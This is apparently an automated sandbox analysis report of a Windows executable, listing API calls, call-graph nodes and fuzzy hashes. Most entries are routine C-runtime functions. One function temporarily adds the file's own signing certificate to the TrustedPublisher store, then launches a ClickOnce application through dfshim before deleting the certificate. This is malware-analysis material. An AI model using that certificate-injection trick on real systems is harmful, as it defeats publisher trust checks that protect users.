___scrt_is_nonwritable_in_current_image 6267->6268 6301 ac56e2 EnterCriticalSection 6268->6301 6270 ac8270 6315 ac8285 6270->6315 6272 ac827c _abort 6272->6258 6273 ac8244 DeleteCriticalSection 6275 ac4869 _free 15 API calls 6273->6275 6276 ac8205 6275->6276 6276->6270 6276->6273 6302 ac901c 6276->6302 6278 ac82a4 6277->6278 6280 
ac7435 DeleteCriticalSection 6277->6280 6279 ac4869 _free 15 API calls 6278->6279 6278->6280 6279->6280 6280->6258 6280->6261 6282 ac7fc7 ___scrt_is_nonwritable_in_current_image 6281->6282 6291 ac56e2 EnterCriticalSection 6282->6291 6284 ac806a 6296 ac808a 6284->6296 6285 ac7fd6 6285->6284 6290 ac7f6b 61 API calls 6285->6290 6292 ac7465 EnterCriticalSection 6285->6292 6293 ac8060 6285->6293 6288 ac8076 _abort 6288->6266 6290->6285 6291->6285 6292->6285 6299 ac7479 LeaveCriticalSection 6293->6299 6295 ac8068 6295->6285 6300 ac572a LeaveCriticalSection 6296->6300 6298 ac8091 6298->6288 6299->6295 6300->6298 6301->6276 6303 ac9028 ___scrt_is_nonwritable_in_current_image 6302->6303 6304 ac904e 6303->6304 6305 ac9039 6303->6305 6314 ac9049 _abort 6304->6314 6318 ac7465 EnterCriticalSection 6304->6318 6306 ac47f9 _free 15 API calls 6305->6306 6308 ac903e 6306->6308 6310 ac473d _abort 21 API calls 6308->6310 6309 ac906a 6319 ac8fa6 6309->6319 6310->6314 6312 ac9075 6335 ac9092 6312->6335 6314->6276 6573 ac572a LeaveCriticalSection 6315->6573 6317 ac828c 6317->6272 6318->6309 6320 ac8fc8 6319->6320 6321 ac8fb3 6319->6321 6326 ac8fc3 6320->6326 6338 ac7f05 6320->6338 6322 ac47f9 _free 15 API calls 6321->6322 6323 ac8fb8 6322->6323 6325 ac473d _abort 21 API calls 6323->6325 6325->6326 6326->6312 6328 ac828e 15 API calls 6329 ac8fe4 6328->6329 6344 ac732b 6329->6344 6331 ac8fea 6351 ac9d4e 6331->6351 6334 ac4869 _free 15 API calls 6334->6326 6572 ac7479 LeaveCriticalSection 6335->6572 6337 ac909a 6337->6314 6339 ac7f1d 6338->6339 6340 ac7f19 6338->6340 6339->6340 6341 ac732b 21 API calls 6339->6341 6340->6328 6342 ac7f3d 6341->6342 6366 ac89a7 6342->6366 6345 ac734c 6344->6345 6346 ac7337 6344->6346 6345->6331 6347 ac47f9 _free 15 API calls 6346->6347 6348 ac733c 6347->6348 6349 ac473d _abort 21 API calls 6348->6349 6350 ac7347 6349->6350 6350->6331 6352 ac9d5d 6351->6352 6353 ac9d72 6351->6353 6354 ac47e6 __dosmaperr 15 API calls 6352->6354 6355 ac9dad 6353->6355 6360 ac9d99 

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00AC1016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00AC1025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00AC1032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00AC1057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00AC1063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00AC1082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00AC10B2
• LocalAlloc.KERNEL32(00000000,?), ref: 00AC10C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 00AC10F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00AC110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00AC111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00AC112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00AC1134
• LocalFree.KERNEL32(00000000), ref: 00AC113E
• LocalFree.KERNEL32(00000000), ref: 00AC115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00AC116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00AC1182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00AC1198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00AC11A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 00AC11BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00AC11C6
• Sleep.KERNELBASE(00009C40), ref: 00AC11E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 00AC120B
• CertCloseStore.CRYPT32(?,00000000), ref: 00AC121A
• LocalFree.KERNEL32(?), ref: 00AC1223
• LocalFree.KERNEL32(?), ref: 00AC1228
• LocalFree.KERNEL32(?), ref: 00AC122D
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AC192B
• IsDebuggerPresent.KERNEL32 ref: 00AC19F7
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AC1A10
• UnhandledExceptionFilter.KERNEL32(?), ref: 00AC1A1A
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AC466B
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AC4675
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AC4682
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002,00000000,?,00AC3F66,00000003,00AC209F,00AC1AFC), ref: 00AC3698
                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002,00000000,?,00AC3F66,00000003,00AC209F,00AC1AFC), ref: 00AC369F
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00AC36B1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: f4e9113eafa24157be0ce62806be8e2939988f4b42369e49663a8d92e13265e7
                                                                                                                                                                                                                                                        • Instruction ID: 9460b21b90b6d96ac055584828acb2be93ced47252f5b8a3c8930660f62ade98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4e9113eafa24157be0ce62806be8e2939988f4b42369e49663a8d92e13265e7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07E0BF32410548AFCF11AF94DE0AF5F3B69EF44345F024418F95557231DB36DD42DA64
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: 9c91acd4e656762697a24f35ed885871f019e4a53feb6c363d6e60e6aafb459e
                                                                                                                                                                                                                                                        • Instruction ID: d2ee55c27e5a411bfdb5c185941bd31444f24e676de470305430f2e6401bc8c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c91acd4e656762697a24f35ed885871f019e4a53feb6c363d6e60e6aafb459e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A31FE72800249ABCB24CF78CC94FEA7BBDEB8A354F0141ADF81997251EA309D418B64
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ACA490,?,?,00000008,?,?,00ACA130,00000000), ref: 00ACA6C2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                        • Opcode ID: 1a16d291f1e5434a2df475ed504dba6d7a15cfc5fb178792368074412f2e3b9f
                                                                                                                                                                                                                                                        • Instruction ID: b76f0633aa75f709c159bfdc3ba3d7b1406acbcde74415f82e329f46c7652241
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a16d291f1e5434a2df475ed504dba6d7a15cfc5fb178792368074412f2e3b9f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FBB139316106089FD719CF28C58AB647BF0FF54368F2A865CE89ACF2A1C335D992CB41
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AC1BEA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                                        • Opcode ID: a0b61f4d320981cf247abc7ce7d430a59b5808b5477c2449e7147c583447bd73
                                                                                                                                                                                                                                                        • Instruction ID: b5e7dc3f32af9f841d38479bc855d144911d8cb7ac335f8b148e2aa5c648eece
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0b61f4d320981cf247abc7ce7d430a59b5808b5477c2449e7147c583447bd73
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E519AB1E112059BEB15CFA4D881BAEBBF0FB49304F25802AD402EB295E3749942CF50
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00AC1300), ref: 00AC1AB1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                        • Opcode ID: d39058dc16bfd2a36a75d98a4e7b77f282d1b003af782c3d25827000d168802a
                                                                                                                                                                                                                                                        • Instruction ID: b2cd0899256a3bafc018f0c4f57ddd3d3f581722504f1a946e98ed02634ca1ca
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d39058dc16bfd2a36a75d98a4e7b77f282d1b003af782c3d25827000d168802a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00AC654B
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6095
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60A7
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60B9
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60CB
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60DD
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC60EF
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6101
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6113
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6125
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6137
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC6149
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC615B
                                                                                                                                                                                                                                                          • Part of subcall function 00AC6078: _free.LIBCMT ref: 00AC616D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6540
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6562
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6577
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6582
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65A4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65B7
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65C5
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC65D0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6608
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC660F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC662C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6644
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 161543041-0

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4344
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4350
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC435B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4366
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4371
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC437C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4387
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4392
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC439D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC43AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00AC54C8,00000000,?,?,?,00AC7D05,?,?,00000100), ref: 00AC7B0E
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AC7B46
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AC7D05,?,?,00000100,5EFC4D8B,?,?), ref: 00AC7B94
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AC7C2B
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AC7C8E
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC7C9B
                                                                                                                                                                                                                                                          • Part of subcall function 00AC62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AC7E5B,?,00000000,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD), ref: 00AC6331
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC7CA4
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC7CC9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2597970681-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AC8B8C,?,00000000,?,00000000,00000000), ref: 00AC8459
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00AC84D4
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00AC84EF
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AC8515
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00AC8B8C,00000000,?,?,?,?,?,?,?,?,?,00AC8B8C,?), ref: 00AC8534
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00AC8B8C,00000000,?,?,?,?,?,?,?,?,?,00AC8B8C,?), ref: 00AC856D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1324828854-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AC1E37
                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00AC1E3F
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AC1EC8
                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00AC1EF3
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AC1F48
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00AC61DF: _free.LIBCMT ref: 00AC6208
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6269
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC6274
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC627F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62D3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62DE
